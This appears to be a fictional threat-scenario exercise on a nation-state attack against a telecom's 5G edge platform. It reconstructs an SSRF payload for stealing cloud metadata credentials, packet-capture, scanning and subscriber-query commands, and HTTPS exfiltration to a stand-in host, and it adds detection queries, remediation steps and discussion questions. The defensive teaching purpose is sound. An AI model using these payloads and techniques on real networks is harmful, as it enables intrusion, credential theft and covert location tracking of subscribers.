Skip to content

SC-059: 5G Edge Computing Attack

Scenario Overview

The nation-state threat actor "SIGNAL GHOST" targets a major telecom provider's Multi-access Edge Computing (MEC) infrastructure. The attack begins with exploitation of an API vulnerability in the MEC orchestration platform, followed by a container escape to gain access to the underlying edge node. From the compromised edge node, SIGNAL GHOST intercepts real-time data being processed at the edge — including location services, IoT telemetry, and low-latency application traffic. The attacker then pivots laterally through the telecom's internal network to access the subscriber database, enabling real-time location tracking, SMS interception, and voice call metadata collection for high-value intelligence targets.

Environment: TelcoNet 5G network; MEC platform at 10.100.0.0/16; Core network at 10.50.0.0/16; Subscriber DB at 172.16.200.0/24 Initial Access: API vulnerability in MEC orchestrator (T1190) Impact: Real-time location tracking of targets, SMS interception, voice call metadata, edge application data theft Difficulty: Expert (nation-state resources) Sector: Telecommunications

Threat Actor Profile

SIGNAL GHOST is a nation-state cyber espionage unit specializing in telecommunications infrastructure compromise. Active since 2021, the group has been attributed to operations targeting telecom providers across three continents. SIGNAL GHOST maintains deep expertise in 3GPP protocols, MEC architectures, and mobile core network internals. Their operations prioritize persistent access to telecom infrastructure for ongoing intelligence collection rather than destructive attacks.

Motivation: Intelligence collection — surveillance of diplomatic, military, and political targets via telecom infrastructure Capability: Very High — custom exploits for telecom-specific platforms, deep 3GPP protocol expertise Target Sectors: Telecommunications, mobile network operators, edge computing providers Estimated Operations: 12-15 telecom providers compromised globally since 2021 Distinguishing Feature: Maintains persistent access for 18+ months on average before detection

5G Edge Computing Threat Landscape

Multi-access Edge Computing introduces new attack surfaces to telecom networks:

  • API exposure: MEC orchestration APIs are increasingly exposed for third-party application deployment
  • Container-based architecture: Edge workloads run in containers, introducing container escape risks
  • Data proximity: Edge computing processes sensitive data (location, IoT, healthcare) close to users
  • Lateral movement: Edge nodes bridge IT and telecom networks, creating pivot opportunities
  • Scale: A single MEC compromise can affect millions of subscribers in a geographic area

Attack Timeline

Timestamp (UTC) Phase Action
2026-02-01 Reconnaissance External API enumeration of TelcoNet MEC platform
2026-02-05 Vulnerability Discovery Identified SSRF vulnerability in MEC orchestrator API v2.3
2026-02-10 03:14:00 Initial Access Exploited SSRF to gain code execution in MEC orchestrator pod
2026-02-10 03:30:00 Container Escape CVE-2026-XXXX (simulated) — runc escape to edge node host
2026-02-10 04:00:00 Discovery Enumerated edge node services, network interfaces, connected pods
2026-02-10 06:00:00 Collection Intercepted edge-processed location services data
2026-02-12 02:00:00 Lateral Movement Pivoted from edge node to MEC management plane via service mesh
2026-02-15 01:00:00 Lateral Movement Accessed core network via GTP-C tunnel from MEC to PGW/SMF
2026-02-18 03:00:00 Collection Queried subscriber database (HSS/UDM) for target IMSIs
2026-02-20 ongoing Persistent Collection Real-time location tracking and SMS interception for 23 targets
2026-03-15 Detection Anomalous GTP tunnel traffic detected by network analytics

Technical Analysis

Phase 1: MEC API Reconnaissance and Exploitation

SIGNAL GHOST identifies and exploits a Server-Side Request Forgery (SSRF) vulnerability in the MEC orchestrator's application management API.

# API reconnaissance (from MEC platform access logs)

# External API endpoint: https://mec-api.telconet.example.com/v2/
# Attacker source: 203.0.113.15 (commercial VPN exit node)

# API enumeration requests:
# GET /v2/app_list        — 200 OK (unauthenticated — misconfiguration)
# GET /v2/app_instances   — 200 OK (lists running edge applications)
# GET /v2/platforms       — 200 OK (reveals MEC platform details)
# GET /v2/dns_rules       — 200 OK (edge DNS configuration)

# SSRF exploitation in application onboarding endpoint:
# POST /v2/app_packages
# Content-Type: application/json
# Authorization: Bearer <stolen_service_token>
#
# {
#   "appPkgName": "edge-analytics-v2",
#   "appPkgVersion": "2.0.1",
#   "appProvider": "TelcoNet-Partner",
#   "packageUrl": "http://169.254.169.254/latest/meta-data/iam/
#                  security-credentials/mec-orchestrator-role"
# }
#
# Response: 200 OK — returned cloud IAM credentials for the orchestrator role
# The SSRF allowed the attacker to query the cloud metadata service
# and obtain temporary credentials with elevated privileges

# Second-stage exploitation:
# POST /v2/app_instances
# Used obtained credentials to deploy a malicious container to edge node
# Container image: registry.example.com/edge-monitor:latest (attacker-controlled)
# Deployed to: edge-node-dc01 (10.100.1.10)

Phase 2: Container Escape to Edge Node Host

The attacker escapes the container to gain root access on the edge node host, leveraging a vulnerability in the container runtime.

# Container escape (reconstructed from forensic analysis of edge node)

# Attacker's malicious container runs on edge-node-dc01
# Container ID: a1b2c3d4e5f6 (pod: edge-monitor-7f8d9c)
# Container runtime: containerd 1.6.x with runc 1.1.x

# Exploit chain (CVE-2026-XXXX — simulated):
# 1. Container writes malicious binary to /proc/self/exe via symlink race
# 2. Triggers runc re-execution with attacker-controlled binary
# 3. Gains root shell on edge node host

# Post-escape verification (from attacker's command history):
# id
# uid=0(root) gid=0(root) groups=0(root)
# hostname
# edge-node-dc01
# uname -a
# Linux edge-node-dc01 5.15.0-mec #1 SMP x86_64 GNU/Linux

# Edge node network interfaces:
# eth0: 10.100.1.10/24    — MEC management network
# eth1: 10.100.100.10/24  — Edge application data plane
# eth2: 172.16.50.10/24   — Core network interconnect (GTP tunnel endpoint)
# gtp0: 10.45.0.1/16      — GTP-U user plane tunnel interface

# Discovery of co-located edge services:
# kubectl get pods --all-namespaces (from host)
# NAMESPACE       NAME                              STATUS
# edge-apps       location-service-5d8f7c           Running
# edge-apps       iot-gateway-3a2b1c                Running
# edge-apps       video-analytics-9e8d7f            Running
# mec-platform    mec-orchestrator-6c5b4a           Running
# mec-platform    service-mesh-proxy-2f1e0d         Running
# telco-core      gtp-proxy-8g7h6i                  Running

Phase 3: Edge Data Interception

With root access on the edge node, SIGNAL GHOST intercepts real-time data processed by edge applications.

# Data interception from edge node (from forensic timeline)

# Location services interception:
# The location-service pod processes real-time user location updates
# from the 5G Radio Access Network (RAN)

# Attacker deployed packet capture on edge data plane:
# tcpdump -i eth1 -w /tmp/.cache/edge_capture.pcap \
#   'port 8443 or port 9090' -c 100000

# Intercepted location data format (from PCAP analysis):
# {
#   "imsi": "310150123456789",
#   "timestamp": "2026-02-10T06:15:22Z",
#   "location": {
#     "cell_id": "0x1A2B3C4D",
#     "tracking_area": "0x5E6F",
#     "latitude": 38.8977,
#     "longitude": -77.0365,
#     "accuracy_m": 15
#   },
#   "device_type": "smartphone",
#   "event": "location_update"
# }

# IoT gateway data interception:
# Industrial IoT telemetry from connected manufacturing sensors
# Intercepted: temperature, pressure, production rates from 340 sensors
# Potential value: industrial espionage on manufacturing processes

# Attacker established persistent data siphon:
# Created systemd service: /etc/systemd/system/edge-health-monitor.service
# Description: "MEC Edge Health Monitor" (masquerading as legitimate service)
# Actual function: continuous packet capture + filtered extraction
# Exfil: encrypted upload every 6 hours to 198.51.100.33 via HTTPS

Phase 4: Lateral Movement to Core Network

SIGNAL GHOST pivots from the edge node into the telecom core network via GTP tunnel interfaces.

# Lateral movement to core network (from network forensics)

# The edge node has a GTP tunnel interface (gtp0) connecting to the
# Packet Gateway (PGW) / Session Management Function (SMF) in the core

# Attacker enumerated the core network via the GTP interface:
# From edge-node-dc01 (10.100.1.10):
# ping -c 1 172.16.50.1    — PGW/SMF gateway (ALIVE)
# nmap -sS -T2 172.16.50.0/24 -p 2123,2152,8805,29274

# Discovered core network elements:
# 172.16.50.1   — SMF (Session Management Function) — GTP-C port 2123
# 172.16.50.5   — UPF (User Plane Function) — GTP-U port 2152
# 172.16.50.10  — AUSF (Authentication Server Function)
# 172.16.50.20  — UDM (Unified Data Management) — HTTP/2 port 8443
# 172.16.200.50 — HSS/UDR (Home Subscriber Server / Unified Data Repository)

# Service mesh exploitation:
# The MEC service mesh had a misconfigured mTLS policy allowing
# edge workloads to authenticate to core network services
# Attacker used stolen service mesh certificate:
# Subject: CN=edge-monitor.mec-platform.svc.cluster.local
# Issuer: TelcoNet Internal CA
# Valid: 2025-08-01 to 2026-08-01

# GTP-C signaling to query subscriber location:
# Attacker crafted GTP-C Create Session Request to SMF
# to obtain session information for target IMSIs
# Tool: custom Python script using scapy with GTP extensions
# python3 gtp_query.py --target-imsi 310150987654321 --smf 172.16.50.1

Phase 5: Subscriber Database Access and Surveillance

The attacker accesses the subscriber database to identify and track specific intelligence targets.

# Subscriber database queries (from UDM/HSS audit logs)

# Attacker connected to UDM via HTTP/2 API (Nudm interface):
# Source: 10.100.1.10 (edge-node-dc01 — compromised)
# Destination: 172.16.200.50:8443 (HSS/UDR)
# Authentication: mTLS with stolen service mesh certificate

# Subscriber data queries:
# GET /nudm-sdm/v2/imsi-310150987654321/subscriber-data
# GET /nudm-sdm/v2/imsi-310150111222333/subscriber-data
# [23 unique IMSI queries over 3-week period]

# Data retrieved per subscriber:
# - IMSI, MSISDN (phone number), IMEI (device identifier)
# - Current serving cell and tracking area
# - Authentication vectors (for session hijacking)
# - Subscribed services (voice, data, SMS)
# - Real-time location via serving network function

# Active surveillance capabilities established:
# 1. Real-time location tracking (15-second update interval)
# 2. SMS interception via S6a/Nudm interface manipulation
# 3. Voice call metadata (CDR) collection — caller, callee, duration, cell
# 4. Data session metadata — connected apps, bandwidth usage
# 5. IMEI tracking — identify when targets change devices

# All collected data encrypted and exfiltrated via:
# HTTPS POST to 198.51.100.33/api/v1/telemetry (masquerading as IoT data)
# Exfiltration volume: ~2 GB/day of processed intelligence

Detection Opportunities

KQL — MEC API SSRF Exploitation Detection

// Detect SSRF attempts targeting cloud metadata or internal services
ApiManagementGatewayLogs
| where TimeGenerated > ago(7d)
| where RequestUrl has_any (
    "169.254.169.254", "metadata.google", "metadata.azure",
    "localhost", "127.0.0.1", "10.", "172.16.", "192.168."
  )
| where ResponseCode between (200 .. 299)
| project TimeGenerated, CallerIpAddress, RequestUrl, ResponseCode,
    ApiId, RequestHeaders = RequestHeaders
| sort by TimeGenerated desc

KQL — Container Escape Indicators on Edge Nodes

// Detect container runtime exploitation and escape attempts
SyslogData
| where TimeGenerated > ago(24h)
| where Computer startswith "edge-node"
| where SyslogMessage has_any (
    "runc", "containerd", "nsenter", "/proc/self/exe",
    "CAP_SYS_ADMIN", "mount namespace", "cgroup escape"
  )
| where SyslogMessage has_any ("error", "exploit", "unexpected", "denied")
    or SyslogMessage has "uid=0"
| project TimeGenerated, Computer, SyslogMessage, ProcessName
| sort by TimeGenerated desc

KQL — Anomalous GTP Tunnel Traffic from Edge Nodes

// Detect unexpected GTP signaling from MEC edge nodes to core network
CommonSecurityLog
| where TimeGenerated > ago(7d)
| where SourceIP startswith "10.100."  // MEC edge network
| where DestinationPort in (2123, 2152, 8805)  // GTP-C, GTP-U, PFCP
| where DestinationIP startswith "172.16."  // Core network
| summarize
    FlowCount = count(),
    UniqueDestinations = dcount(DestinationIP),
    DestPorts = make_set(DestinationPort),
    TotalBytes = sum(SentBytes)
    by SourceIP, bin(TimeGenerated, 1h)
| where FlowCount > 100
| sort by FlowCount desc

KQL — Subscriber Database Query Anomalies

// Detect unusual query patterns against HSS/UDM subscriber data
AuditLogs_Telecom_CL
| where TimeGenerated > ago(24h)
| where ServiceName_s == "UDM" or ServiceName_s == "HSS"
| where OperationType_s == "subscriber_query"
| summarize
    QueryCount = count(),
    UniqueIMSIs = dcount(TargetIMSI_s),
    SourceIPs = make_set(SourceIP_s),
    QueryTypes = make_set(QueryType_s)
    by SourceIP_s, bin(TimeGenerated, 1h)
| where UniqueIMSIs > 5
| where SourceIP_s startswith "10.100."  // Queries from edge — unexpected
| sort by UniqueIMSIs desc

SPL — Unauthorized Edge Node Packet Capture Detection

index=endpoint sourcetype="syslog" host="edge-node-*"
  (process="tcpdump" OR process="tshark" OR process="dumpcap"
   OR CommandLine="*pcap*" OR CommandLine="*capture*")
| stats count as capture_events
        values(process) as tools
        values(CommandLine) as commands
        by host _time span=1h
| where capture_events > 0
| lookup authorized_captures.csv host OUTPUT is_authorized
| where is_authorized!="true"
| eval severity="CRITICAL"
| sort -capture_events

SPL — MEC Service Mesh Certificate Abuse

index=kubernetes sourcetype="kubernetes:audit"
  verb="get" OR verb="list" OR verb="create"
  objectRef.resource="pods" OR objectRef.resource="secrets"
| eval source_ns=objectRef.namespace
| eval user_cn=mvindex(split(user.username, "/"), -1)
| stats count as api_calls
        dc(objectRef.namespace) as accessed_namespaces
        values(objectRef.namespace) as namespace_list
        by user_cn sourceIPs{} span=1h
| where accessed_namespaces > 2
| where match(namespace_list, "telco-core")
| eval alert="Service mesh certificate accessing core namespace from edge"
| sort -api_calls

SPL — Core Network GTP Signaling Anomaly

index=telecom sourcetype="gtp:signaling"
  message_type="create_session_request" OR message_type="modify_bearer_request"
| stats count as signaling_events
        dc(target_imsi) as unique_targets
        values(target_imsi) as imsi_list
        by source_ip span=1h
| where unique_targets > 3
| lookup known_network_elements.csv source_ip OUTPUT element_type
| where element_type!="SGW" AND element_type!="MME"
| eval alert=case(
    unique_targets > 10, "CRITICAL",
    unique_targets > 5, "HIGH",
    1=1, "MEDIUM")
| sort -unique_targets

MITRE ATT&CK Mapping

Tactic Technique ID Technique Name Scenario Phase
Reconnaissance T1595.002 Active Scanning: Vulnerability Scanning MEC API enumeration
Initial Access T1190 Exploit Public-Facing Application SSRF exploitation in MEC API
Execution T1610 Deploy Container Malicious container on edge node
Privilege Escalation T1611 Escape to Host Container escape via runc exploit
Discovery T1046 Network Service Scanning Core network enumeration from edge
Lateral Movement T1021 Remote Services Service mesh pivot to core network
Collection T1040 Network Sniffing Edge data plane packet capture
Collection T1119 Automated Collection Continuous subscriber data siphon
Adversary-in-the-Middle T1557 Adversary-in-the-Middle Edge data interception
Exfiltration T1041 Exfiltration Over C2 Channel HTTPS exfil masquerading as IoT

Impact Assessment

Category Impact
Surveillance 23 high-value targets under real-time location tracking
Communications SMS interception and voice call metadata collection active 25+ days
Data Theft IoT telemetry from 340 industrial sensors exfiltrated
Infrastructure 1 edge node fully compromised, core network access established
Subscriber Privacy Subscriber database queried for targeted individuals
Regulatory Telecom regulatory violations, potential national security breach

Remediation & Hardening

  1. Harden MEC API access — implement mutual TLS, API gateway with WAF rules, and block SSRF payloads targeting metadata endpoints and internal IPs
  2. Deploy container runtime security — implement runtime protection (Falco, Sysdig) to detect container escape attempts, restrict capabilities, and enforce seccomp profiles
  3. Segment edge from core networks — implement strict network policies preventing direct edge-to-core connectivity; route all traffic through a security inspection zone
  4. Enforce zero-trust service mesh — restrict mTLS certificate scope; edge workload certificates must not be valid for core network service authentication
  5. Monitor GTP signaling — deploy GTP-aware IDS/IPS at the edge-core boundary; alert on subscriber queries originating from non-standard network elements
  6. Implement subscriber query auditing — log and alert on all HSS/UDM queries with anomaly detection for unusual query volumes, sources, or target patterns
  7. Deploy edge node integrity monitoring — file integrity monitoring, process whitelisting, and host-based IDS on all MEC edge nodes
  8. Conduct 5G threat modeling — perform regular threat modeling exercises specific to MEC architecture, 3GPP interfaces, and edge-core trust boundaries

Discussion Questions

  1. Multi-access Edge Computing brings compute closer to users but also brings attack surface closer to sensitive data. How should organizations balance the performance benefits of edge computing against the expanded security risks?

  2. The attacker pivoted from a containerized edge workload to the telecom core network. What network segmentation and zero-trust controls would prevent this lateral movement path?

  3. Telecom networks use standardized protocols (GTP, Diameter, HTTP/2 for 5G SBI). How does protocol standardization help and hinder both attackers and defenders?

  4. The compromised edge node had three network interfaces bridging different security domains. How should multi-homed hosts in critical infrastructure be monitored and controlled?

  5. Real-time location tracking of intelligence targets via compromised telecom infrastructure is a known nation-state capability. What detection mechanisms can telecom providers deploy to identify unauthorized subscriber surveillance?

  6. Edge computing platforms often allow third-party application deployment. How should telecom providers vet, isolate, and monitor third-party edge applications to prevent supply chain attacks?

Cross-References